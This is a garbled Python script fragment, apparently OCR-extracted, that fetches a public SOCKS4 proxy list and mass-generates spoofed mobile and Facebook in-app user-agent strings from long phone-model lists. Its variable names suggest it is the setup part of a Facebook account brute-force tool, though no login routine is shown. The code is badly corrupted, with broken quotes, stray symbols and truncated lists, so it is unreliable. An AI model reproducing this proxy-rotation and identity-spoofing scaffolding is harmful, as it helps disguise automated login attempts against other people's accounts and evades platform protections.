---[ IMPORT-MODULE ]---import requests,bs4,json,os,sys,random,datetime,time,re import urllib3,rich,base64 from rich table import Table as me from rich.console import Console as sol from bs4 import BeautifulSoup as sop from concurrent futures import ThreadPoolExecutor as tred from rich.console import Group as gp from rich.panel import Panel as nel from rich import print as cetak from rich.markdown import Markdown as mark from rich.columns import Columns as col from rich import print as rprint from rich import pretty from rich.text import Text as tekz pretty.install() CON=sol() ## RANDOM UA #user\_agent=['Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36', Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Mobile Safari/537.36', Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/96.0.4664.45 Mobile Safari/537.36 [FB\_IAB/FB4A;FBAV/345.0.0.34.118;]',Mozilla/5.0 (Linux; Android 12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36 (Junux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537,36 (KHTML like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537,36 [FB\_IAB/FB4A;FBAV/198.0.0.53.101;], Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36', Mozilla/5.0 (Linux; Android 12; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 12; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 12; LM-Q710(FGN)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36'] uas\_bawaan = "Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id\_ID;FBAV/239.0.0.10.109;]" uas\_realme = "Mozilla/5.0 (Linux; Android 11; RMX2061 Build/RKQ1.201112.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/94.0.4606.85 Mobile Safari/537.36" uas\_nokiac2 = "NokiaC2-00/2.0 (03.45) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 (Java; U; kau; nokiac2-00) UCBrowser8.3.0.154/70/352/UCWEB Mobile" uas\_nokiax20 = "Mozilla/5.0 (Linux; Android 12; Nokia X20 Build/SKQ1.210821.001; wv) AppleWebKit/537.36 (KHTML, seperti Gecko) Versi/4.0 Chrome/98.0.4758.87 Mobile Safari/537.36" uas\_nokiax = "Mozilla/5.0 (Linux; Android 4.1.2; Nokia\_X Build/JZ054K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.87.90 Mobile Safari/537.36 NokiaBrowser/1.0,gzip(gfe)" uas\_vivo = "Mozilla/5.0 (Linux; Android 12; vivo 1907 Build/SP1A.210812.003; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/112.0.5615.135 Mobile Safari/537.36' uas\_oppo = "Mozilla/5.0 (Linux; Android 13; CPH2451 Build/TP1A.220905.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/112.0.5615.135 Mobile Safari/537.36 [FB\_IAB/FB4A;FBAV/413.0.0.30.104;] uas\_samsungse = "Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36" uas\_redmi9a = "Mozilla/5.0 (Linux; U; Android 10; id-id; Redmi 9A Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/89.0.4389.116 Mobile Safari/537.36" uas\_nokiaxI = "Mozilla/5.0 (Linux; Android 4.1.2; Nokia\_XL Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36 NokiaBrowser/1.2.0.12" "#uas\_chromelinux = "Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" #uas\_j7prime = "Mozilla/5.0 (Linux; Android 8.1.0; SM-G610F Build/M1AJQ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36 OPR/51.1.2461.137501 uas\_tes = "Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4X Build/MiUl MS; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/65.0.3325.109 Mobile Safari/537.36 Instagram 38.0.0.13.95 Android (24/7.0; 480dpi; 1080x1920; Xiaomi/xiaomi; Redmi Note 4X; mido; gcom; ru\_RU; 99640911)' uas\_random = random.choice(["Mozilla/5.0 (Linux; U; Android 4.4.2; zh-CN; HUAWEI MT7-TL00 Build/HuaweiMT7-TL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/40.0.2214.89 UCBrowser/11.3.8.909 Mobile Safari/537.36","NokiaC3-00/5.0 (08.63) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+","Mozilla/5.0 (Linux; Android 10; Nokia 5.1 Plus Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, seperti Gecko) Versi/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36"1) uas\_vivo = "Mozilla/5.0 (Linux; Android 12; vivo 1907 Build/SP1A.210812.003; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/112.0.5615.135 Mobile Safari/537.36" uas\_oppo = "Mozilla/5.0 (Linux; Android 13; CPH2451 Build/TP1A.220905.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/112.0.5615.135 Mobile Safari/537.36 [FB\_IAB/FB4A;FBAV/413.0.0.30.104;]"

Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it\_IT;FBAV/239.0.0.10.109;]","Mozilla/5.0 (Linux; Android 4.4.4; en-au; SAMSUNG SM-N915G Build/KTU84P) AppleWebKit/537.36 (KTHML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 4.1.2; Nokia\_X Build/JZ054K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.87.90 Mobile Safari/537.36 NokiaBrowser/1.0,gzip(gfe)","Mozilla/5.0 (Linux; U; Android 4.4.2; zh-CN; HUAWEI MT7-TL00 Build/HuaweiMT7-TL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/40.0.2214.89 UCBrowser/11.3.8.909 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 10; M2006C3MG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 7.0; SM-G930VC Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/58.0.3029.83 Mobile Safari/537.36"])

uas\_nokiac3 = "NokiaC3-00/5.0 (08.63) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"

uas\_nokia5plus = "Mozilla/5.0 (Linux; Android 10; Nokia 5.1 Plus Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, seperti Gecko) Versi/4.0

uas\_random2 = random.choice(["Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko)

uas\_iphone = "Mozilla/5.0 (iPhone; CPÚ iPhone OS 13\_3\_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148

[FBAN/FBIOS;FBDV/iPhone11,8;FBMD/iPhone;FBSN/iOS;FBSV/13.3.1;FBSS/2;FBID/phone;FBLC/en\_US;FBOP/5;FBCR/]

Chrome/83.0.4103.106 Mobile Safari/537.36"

```
---[ USER-AGENT ]-----
  ugen2=[]
  ugen=[]
  cokbrut=[]
  ses=requests.Session()
  princp=[]
  trv
         prox= requests.get('https://api.proxyscrape.com/v2/?
  request=displayproxies&protocol=socks4&timeout=100000&country=all&ssl=all&anonymity=all').text
         open('.proxv.txt'.'w').write(prox)
  except Exception as e:
         exit(e)
  for xd in range(5000):
  aa='Mozilla/5.0 (Linux; U; Android'
  b=random.choice(['3',4',5',6',7',8',9',10',11',12',13',14',15',16',17'])
  c=' en-us: GT-
  d=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
  e=random.randrange(1, 999)
  f=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
  g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
  h=random.randrange(73,100)
  i='0'
 j=random.randrange(4200,4900)
  k=random.randrange(40,150)
  I='Mobile Safari/537.36'
  uaku2=(f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}')
  ugen.append(uaku2)
  for xd in range(10000):
  a='Mozilla/5.0 (Linux; Android 13;'
  b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
  c=random.choice(['SM-A037U)'])
  d=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
  e=random.randrange(1, 999)
  f=random.choice(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
  g='AppleWebKit/537.36 (KHTML, like Gecko)'
  h=random.randrange(80,103)
  j=random.randrange(4200,4900)
  k=random.randrange(40,150)
  l='Chrome/112 0.0 0 Mobile Safari/537.36'
  uaku=f'{a} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
  for xd in range(10000):
       rr = random.randint; rc = random.choice
       aZ = str(rc(['A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']))
       lonte = f''\{str(rc(aZ))\}\{str(rc(aZ))\}\{str(rc(aZ))\}\{str(rc(aZ))\}\}
       build_nokiax = ['JDQ39','JZO54K']
oppo = ["CPH1869", "CPH1929", "CPH2107", "CPH2389", "CPH2389", "CPH2401", "CPH2407", "CPH2413", "CPH2415", "CPH2417", "CPH2419", "CPH2455", "CPH2459", "CPH2461", "CPH2471", "CPH2473", "CPH2477", "CPH8893", "CPH2321", "CPH2341", "CPH2373", "CPH2083", "CPH2071", "CPH2077", "CPH2185", "CPH2185", "CPH2137", "CPH2469", "CPH2421", "CPH2349", "CPH2931", "CPH1923", "CPH1925", "CPH1837", "CPH2015", "CPH2015", "CPH2081", "CPH2029", "CPH2031", "CPH2031", "CPH2061", "CPH1803", "CPH1805", "CPH1809", "CPH1809", "CPH1935", "CPH1935", "CPH1935", "CPH1935", "CPH1935", "CPH1935", "CPH1935", "CPH2399", "CPH2135", "CPH2399", "CPH2135", "CPH2399", "CPH2197", "CPH2127", "CPH2127", "CPH2139", "CPH2139", "CPH2139", "CPH2139", "CPH1901", "CPH2067", "CPH2067", "CPH2067", "CPH2099", "CPH2161", "CPH2197", "CPH2067", "CPH2067", "CPH2099", "CPH1938", "CPH1937", "CPH2067", "CPH2099", "CPH1938", "CPH1937", "CPH2067", "CPH2099", "CPH1938", "CPH1939", "CPH19411", "CPH2001", "CPH2021", "CPH2059", "CPH2121", "CPH2233", "CPH2338", "CPH1729", "CPH1827", "CPH1938", "CPH1911", "CPH1915", "CPH1969", "CPH1969", "CPH2001", "CPH2095", "CPH20121", "CPH2285", "CPH2203", "CPH2333", "CPH2365", "CPH1619", "CPH1915", "CPH19727", "CPH1727", "CPH1821", "CPH1825", "CPH1821", "CPH1821", "CPH1823", "CPH1821", "CPH1823", "CPH1823", "CPH1871", "CPH1875", "CPH1875", "CPH1875", "CPH1875", "CPH1875", "CPH1875", "CPH1875", "CPH1979", "CPH1911", "CPH1919", "CPH1911", "CPH1915", "CPH2015", "CPH2015", "CPH2011", 
       oppo = ["CPH1869", "CPH1929", "CPH2107", "CPH2238", "CPH2389", "CPH2401", "CPH2407", "CPH2413", "CPH2415", "CPH2415", "CPH2417", "CPH2419", "CP
  "2201123G", "2203129G", "2201122G", "2201122C", "2206122SC", "22081212C", "2112123AG", "2112123AC", "2109119BC", "M2002J9G"
  "M2007J1SC", "M2007J17I", "M2102J2SC", "M2007J3SY", "M2007J17G", "M2007J3SG", "M2011K2G", "M2101K9AG ", "M2101K9R", "2109119DG", "M2101K9G", "2109119DI", "M2012K11G", "M2102K1G", "21081111RG", "2107113SG", "21051182G", "M2105K81AC", "M2105K81C", "21061119DG",
 ....210811119G", "21051182G", "M2105K81AC", "M2105K81C", "21061119DG", "21121119SG", "22011119UY", "21061119AG", "22041219NY", "22041219G", "21061119BI", "220233L2G", "220233L2I", "220333QNY", "220333QAG", "M2004J7AC", "M2004J7BC", "M2004J19C", "M2006C3MII", "M2010J19SI", "M2006C3LG", "M2006C3LVG", "M2006C3MG", "M2006C3MG", "M2006C3MNG", "M2006C3LII", "M2010J19SL", "M2010J19SG", "M2010J19SY", "M2012K11AC", "M2012K10C", "M2012K11C", "22021211RC"]
"22021211RC"]
realme = ["RMX3516", "RMX3371", "RMX3461", "RMX3286", "RMX3561", "RMX3388", "RMX3311", "RMX3142", "RMX2071", "RMX1805", "RMX1809",
"RMX1801", "RMX1807", "RMX1803", "RMX1825", "RMX1821", "RMX1822", "RMX1833", "RMX1851", "RMX1853", "RMX1857", "RMX1827", "RMX1911", "RMX1919",
"RMX1927", "RMX1971", "RMX1973", "RMX2030", "RMX2032", "RMX1925", "RMX1929", "RMX2001", "RMX2061", "RMX2063", "RMX2040",
"RMX2002", "RMX2151", "RMX2163", "RMX2155", "RMX2170", "RMX2103", "RMX3085", "RMX3241", "RMX3081", "RMX3151", "RMX3381", "RMX3521",
"RMX3474", "RMX3471", "RMX3472", "RMX3392", "RMX3393", "RMX3491", "RMX1811", "RMX2185", "RMX3231", "RMX2189", "RMX2180", "RMX2195",
"RMX2101", "RMX1941", "RMX1945", "RMX3063", "RMX3061", "RMX3201", "RMX3203", "RMX3261", "RMX3263", "RMX3193", "RMX3191", "RMX3195",
"RMX3197", "RMX3266", "RMX3268", "RMX3269", "RMX2027", "RMX2020", "RMX2021", "RMX3581", "RMX3501", "RMX3503", "RMX3501", "RMX3301", "RMX3301"
```

```
"RMX1903", "RMX1992", "RMX1993", "RMX1991", "RMX1931", "RMX2142", "RMX2081", "RMX2085", "RMX2083", "RMX2086", "RMX2086", "RMX2144", "RMX2051", "RMX2025", "RMX2075", "RMX2076", "RMX2076", "RMX2072", "RMX2052", "RMX2176", "RMX2121", "RMX3115", "RMX1921"]
infinix = ["X676B", "X687", "X609", "X699", "X689D", "X507", "X605", "X668", "X6815B", "X624", "X655F", "X689C", "X608", "X698", "X698", "X682B", "X682C", "X688B", "X658E", "X659B", "X689B", "X689D", "X669D", "X662", "X675", "X6812B", "X6812", "X6812", "X6817", "X6816C", "X6816", "X6816D", "X668C", "X668C", "X665B", "X665E", "X510", "X559C", "X559F", "X559F", "X559F", "X660C", "X606C", "X606D", "X623", "X624B", "X625C", "X625D", "X625B", "X650D", "X650B", "X650", "X650C", "X655C", "X665D", "X573", "X573", "X573B", "X622", "X693", "X695C", "X695D", "X695", "X663B", "X663", "X670", "X671", "X671B", "X672", "X6819", "X572", "X572-LTE", "X571", "X604", "X510B", "X690", "X690B", "X656", "X692", "X683", "X450", "X5510", "X5516C", "X627", "X626B", "X652A", "X653C", "X652B", "X660C", "X660C", "X515F", "X5515F", "X5515F", "X5515F", "X5514D", "X5516B", "X5516C", "X627", "X680", "X653", "X653C", "X657D", "X607", "X6611"] "X611B", "X6611", "X612B", "X6261", "X6261", "X6262", "X6921", "X6811"] "X6811"] "X6811"] "X6811"] "X6811"] "X6811"] "X6813M", "A0136", "A0136", "A0136", "A0136", "A0136", "A0136", "A0136", "A0136", "A0136", "A025A", "A025A", "A025A", "A025A", "A025A", "A025A", "A0356", "A03
samsung = ["E025F", "G996B", "A826S", "E135F", "G798B", "G998B", "F936U1", "G361F", "A716S", "J327AZ", "E426B", "A015F", "A015M", "A013G", "A013G", "A013M", "A013F", "A022M", "A022G", "A022F", "A025M", "S124DL", "A025U", "A025A", "A025G", "A025F", "A025A", "A035F", "A035F", "A035F", "A037F", "A037F", "A037M", "S134DL", "A037G", "A105G", "A105M", "A105F", "A105FN", "A105FN", "A102U", "S102DL", "A102U1", "A107F", "A107M", "A115AZ", "A115U", "A115U", "A115M", "A115F", "A125F", "A125F", "A125F", "A125M", "A125M", "A127M", "A135F", "A135M", "A136U", "A336U1", "A336W", "A260G", "A260G", "A260G", "A260G", "A205GN", "A205G", "A205GF", "A205FN", "A205F", "A207O", "A207O", "A207F", "A207M", "A215U", "A217F", "A217F", "A217F", "A217F", "A225F", "A225F", "A225B", "A226B", "A226B", "A226B", "A236F", "A330F", "A300FU", "A300F", "A300H", "A310M", "A310G", "A300F", "A305G", "A305G", "A305G", "A305G", "A307FN, "A307FN, "A307FN, "A307FN, "A315F", "A325F", "A325F", "A325F", "A325M", "A326W", "A336B", "A336B", "A430F", "A405FN", "A405FN", "A305G", "A500FU", "A700PU", "A710FU", "A710FU", "A710M", "A720F", "A750FN", "A750FN", "A750FN", "A700PU", "A700PU", "A710FU", "A710M", "A725F", "A750FN", "A750FN", "A750FN", "A750FN", "A750FN", "A750FN", "A700PU", "A710FU", "G8850F", "G887F", "G885FY", "G885SF", "G885SY", "G885SS", "A730FF", "G887FT", "G386BT", "G385BT", "G385BT", "G356BW, "G353BW, "G350BU", "G350BU",
"G3508J", "G3502I", "G3502C", "S820L", "G360H", "G360F", "G360M", "G361H", "E500H", "E500H", "E5000H", "E500H", "I100H", "J110H", "J110H", "J110H", "J110H", "J110H", "J110H", "J110H", "J110H", "J106H", "J106H", "J200H", "J250H", "J250H", "J250H", "J250H", "J327H", "J337H", "J330H", "J530H", "J530H", "J530H", "J530H", "J530H", "J530H", "J530H", "J530H", "J570H", "J500H", "J500H", "J510H", "J510H", "J510H", "J710H", "J710H", "J700H", "J700H", "J700H", "J700H", "J700H", "J700H", "J700H", "J700H", "J737H", "J727H", "J727H"
"M317F", "M325FV", "M325FV", "M326B", "M336B", "M336BU", "M405F", "M426B", "M515F", "M526BR", "M526BR", "M536B", "M625F", "G750H", "G7508Q", "G7509", "N970U", "N970F", "N971N", "N970U1", "N970U1", "N975U1", "N975U1", "N975F", "N975F", "N975F", "N976N", "N980F", "N981U", "N981B", "N985F", "N9860", "N986N", "N986B", "N986W", "N9008V", "N9006", "N900A", "N9005", "N900W8", "N9000", "N9009", "N900P", "N900Q", "N9002", "9005", "N750L", "N7505", "N7505", "N7505", "N7505", "N910F", "N910V", "N910U", "N910H", "N910BV", "N9100", "N915FY", "N9156", "N9155F", "N9155", "N915D", "N915W8", "N916W8", "N916K", "N916L", "N916LSK", "N920L", "N920C", "N920C", "N920C", "N920C", "N920V", "N920V", "N920V", "N920K", "N920S", "N930F", "N930F", "N930W8", "N930W8", "N930W8", "N930V", "N930T", "N950F", "N950F", "N950F", "N960U", "N960F", "N960U", "N935F", "N935F", "N935K", "N935S", "G550T1", "G550T1", "G550T1", "G555T1", "G555T1", "G550T1", "G550T1", "G550T1", "G973W1", "G973W1", "G973W1", "G973W1", "G973W1", "G973W1", "G973W1", "G973W1", "G973W1", "G970U1", "G770DF", "G970F", "G970U1", "G970F", "G996W1", "G990F1", "G900F1", "
        "G955W", "G955N", "G960U", "G960U1", "G960F", "G965U", "G965F", "G965U1", "G965N", "G9650", "J321AZ", "J326AZ", "J336AZ", "T116", "T116NV", "T116NV", "T116NV", "T2519", "G318HZ", "T255S", "W2016", "W2018", "W2019", "W2021", "W2022", "G600S", "E426S", "G3812", "G3812B", "G3818B",
        "G388F", "G389F", "G390F", "G398FN"]
                       gt = [[GT-1015], GT-1020], GT-1030], GT-1035], GT-1040], GT-1045], GT-1040], GT-1040
          19083','GT-19105','GT-19152','GT-19192','GT-19300','GT-19505','GT-2000','GT-2000','GT-2000','GT-3000','GT-414X0P','GT-6918','GT-7010','GT-7020','GT-
```

7030',GT-7040',GT-7050',GT-7100',GT-7105',GT-7110',GT-7205',GT-7210',GT-7240R',GT-7245',GT-7303',GT-7310',GT-7320',GT-7325',GT-7326',GT-7326',GT-7325',GT-735',GT-735',GT-735',GT-735',GT-735',GT-735',GT-735',GT-735',GT-735',GT-735',GT-735',GT-735' 7340';GT-7405';GT-7550 5GT-8005';GT-8010';GT-811';GT-810';GT-8105';GT-8110';GT-8220S';GT-8410';GT-9300';GT-9320';GT-93G';GT-A7100';GT-A9500';GT-ANDROID';GT-B2710';GT-B5330';GT-B5330B';GT-B5330L';GT-B5330ZKAINU';GT-B5510';GT-B5512';GT-B5722';GT-B7510';GT-B7722';GT-B7702' B7810','GT-B9150','GT-B9388','GT-C33010','GT-C3262','GT-C3310R','GT-C3312R','GT-C3312R','GT-C3313T','GT-C3322','GT-C3322i','GT-C3520I,'GT-C3520I','GT-C350I','GT-C350I','GT-C350I','GT-C350I','GT-C350I','GT-C350I','GT-C350I','GT-C350I','GT-C350I','GT-C350I','GT-C350I','GT C3592',GT-C3595',GT-C3782',GT-C6712',GT-E1282T',GT-E1500',GT-E2200',GT-E2202',GT-E2250',GT-E2252',GT-E2600',GT-E2652W',GT-E3210',GT-E3309','GT-E33091','GT-E3309T','GT-G530H','GT-g900f','GT-G930F','GT-H9500','GT-I5508','GT-I5801','GT-I6410','GT-I8150','GT-I81600KLTPA','GT-I8160ZWLTTT';GT-I8258';GT-I8262D';GT-I8268';GT-I8505';GT-I8530BAABTU';GT-I8530BALCHO';GT-I8530BALTTT';GT-I8550E';GT-i8700';GT-I8750';GT-I900';GT-I9008L';GT-I9040';GT-I9080E';GT-I9082C';GT-I9082EWAINU';GT-I9082I';GT-I9100G';GT-I9100LKLCHT';GT-I9100M';GT-I9100P';GT-I9100T';GT-I9105UANDBT',GT-I9128E',GT-I9128I',GT-I9128V',GT-I9158P',GT-I9158V',GT-I9168I',GT-I9192I',GT-I9195H',GT-I9195L',GT-I9250',GT-I9303I',GT-I9305N';GT-I9308I';GT-I9505G';GT-I9505X';GT-I9507V';GT-I9600';GT-m190';GT-M5650';GT-mini';GT-N5000S';GT-N5100';GT-N5105';GT-N5110';GT-N5100';GT-N5 N5120',GT-N7000B',GT-N7005',GT-N7100T',GT-N7102',GT-N7105',GT-N7105T',GT-N7108',GT-N7108D',GT-N8000',GT-N8005',GT-N8010',GT-N8020',GT-N8 N9000','GT-N9505','GT-P1000CWAXSA','GT-P1000M','GT-P1000T','GT-P1010','GT-P3100B','GT-P3105','GT-P3108','GT-P3110','GT-P5100','GT-P5200','GT-P3100B','GT-P3105','GT-P3108','GT-P P5210XD1','GT-P5220','GT-P6200','GT-P6200L','GT-P6201','GT-P6210','GT-P6211','GT-P6800','GT-P7100','GT-P7300','GT-P7300B','GT-P7310','GT-P7320','GT-P7300B','GT-P7300B','GT-P7310','GT-P732 P7500D','GT-P7500M','GT-P7500R','GT-P7500V','GT-P7501','GT-P7511','GT-S3330','GT-S3332','GT-S3330','GT-S3518','GT-S3570','GT-S35600i,'GT-S3600i,'GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570','GT-S3518','GT-S3570' \$3650';GT-\$3653W';GT-\$3770K';GT-\$3770M';GT-\$3800W';GT-\$3802';GT-\$3850';GT-\$5220';GT-\$5220R';GT-\$5222';GT-\$5230';GT-\$5230W';GT-\$5250W';GT-\$5250W';GT-\$5250W';GT-\$5250W';GT-\$5250W';GT-\$5250W';GT-\$5250W';GT-\$5250W';GT-\$5250W';GT-\$5250W';GT-\$5250W S5233T',GT-S5233W,'GT-S5250',GT-S5253',GT-S5260',GT-S5280',GT-S5282',GT-S5283B',GT-S5292',GT-S5300L',GT-S5300L',GT-S5301L',GT-S5301B',GT-S5282',GT-S5283B',GT-S5292',GT-S5300L',GT-S5300L',GT-S5301L',GT-S5301B',GT-S5282',GT-S5282',GT-S5282',GT-S5282',GT-S5292',GT-S5292',GT-S5300L',GT-S5300L',GT-S5301L',GT-S5301L',GT-S5301L',GT-S5280',GT-S5282',GT-S5282',GT-S5282',GT-S5292',GT-S5292',GT-S5300L',GT-S5300L',GT-S5301L',GT-S5301L',GT-S5280',GT-S5280',GT-S5282',GT-S5282',GT-S5282',GT-S5292',GT-S5292',GT-S5300L',GT-S5300L',GT-S5301L',GT-S5301L',GT-S5280',GT-S5282',GT-S \$5301L';GT-\$5302';GT-\$5302B';GT-\$5303';GT-\$5303B';GT-\$5310L';GT-\$5310B';GT-\$5310C';GT-\$5310E';GT-\$5310G';GT-\$5310G';GT-\$5310I';GT-\$5310L';GT-\$5310E';GT-\$5 \$5310M';GT-\$5310N';GT-\$5312';GT-\$5312B';GT-\$5312C';GT-\$5312L';GT-\$5330';GT-\$5360';GT-\$5360B';GT-\$5360L';GT-\$5360T';GT-\$5363';GT-\$5360B';GT-\$5360C';GT-\$5560C';GT-\$5560C';GT-\$5560C';GT-\$5560C';GT-\$5560C';GT-\$556 \$5367';GT-\$5369';GT-\$5380D';GT-\$5500';GT-\$5560';GT-\$5560';GT-\$5570B';GT-\$5570L';GT-\$5570L';GT-\$5578';GT-\$5600';GT-\$5

```
S5610';GT-S5610K';GT-S5611';GT-S5620';G-S5670';GT-S5670B';GT-S5670HKBZTA';GT-S5690';GT-S5690R';GT-S5830';GT-S5830D';GT-S5830G';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830